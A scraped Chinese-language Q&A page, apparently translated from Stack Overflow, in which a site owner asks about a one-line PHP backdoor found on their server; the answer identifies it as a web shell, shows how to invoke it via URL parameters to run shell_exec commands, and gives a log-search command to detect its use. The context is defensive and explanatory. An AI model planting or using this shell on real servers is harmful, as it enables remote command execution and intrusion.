- android - RelativeLayout 背景可绘制重叠内容
- android - 如何链接 cpufeatures lib 以获取 native android 库?
- java - OnItemClickListener 不起作用,但 OnLongItemClickListener 在自定义 ListView 中起作用
- java - Android 文件转字符串
我在我的一个 PHP 文件中发现了黑客留下的一行脚本。它是这样写的:
<?php
($_=@$_GET[2]).@$_($_POST[1]);
?>
任何人都可以就这行代码的作用给出一些提示吗?谢谢
最佳答案
由于问题被搁置,我已经将其作为评论发布,现在在这里作为答案:
这是一个 PHP 外壳。如果将其重写为 <?php ($_=@$_GET[2]).@$_($_GET[1]); ?>
网址 file.php?2=shell_exec&1=whoami
执行命令 whoami
在外壳上。在您的示例中,一个参数通过 POST 传递,一个通过 GET 传递。所以调用起来有点困难。
您还可以用它调用其他函数。第一个参数始终是函数名称,第二个参数是被调用函数的参数。
显然它在 http://h.ackack.net/tiny-php-shell.html 上有解释( https://twitter.com/dragosr/status/116759108526415872 ) 但网站无法为我加载。
/edit:如果你有权访问服务器日志文件,你可以搜索它们以查看黑客是否使用了这个 shell。一个简单的egrep "(&|\?)2=.+" logs*
在外壳上应该工作。您只能看到执行的命令的一半(只有 GET,没有 POST),但这也许有助于了解攻击者是否真的使用了他的脚本。
关于php - 找到黑客留下的代码,但不明白它的作用,我们在Stack Overflow上找到一个类似的问题: https://stackoverflow.com/questions/19662969/
今天有小伙伴给我留言问到,try{...}catch(){...}是什么意思?它用来干什么? 简单的说 他们是用来捕获异常的 下面我们通过一个例子来详细讲解下
我正在努力提高网站的可访问性,但我不知道如何在页脚中标记社交媒体链接列表。这些链接指向我在 facecook、twitter 等上的帐户。我不想用 role="navigation" 标记这些链接,因
说现在是 6 点,我有一个 Timer 并在 10 点安排了一个 TimerTask。之后,System DateTime 被其他服务(例如 ntp)调整为 9 点钟。我仍然希望我的 TimerTas
就目前而言,这个问题不适合我们的问答形式。我们希望答案得到事实、引用资料或专业知识的支持,但这个问题可能会引发辩论、争论、投票或扩展讨论。如果您觉得这个问题可以改进并可能重新打开,visit the
我就废话不多说了,大家还是直接看代码吧~ ? 1
Maven系列1 1.什么是Maven? Maven是一个项目管理工具,它包含了一个对象模型。一组标准集合,一个依赖管理系统。和用来运行定义在生命周期阶段中插件目标和逻辑。 核心功能 Mav
我是一名优秀的程序员,十分优秀!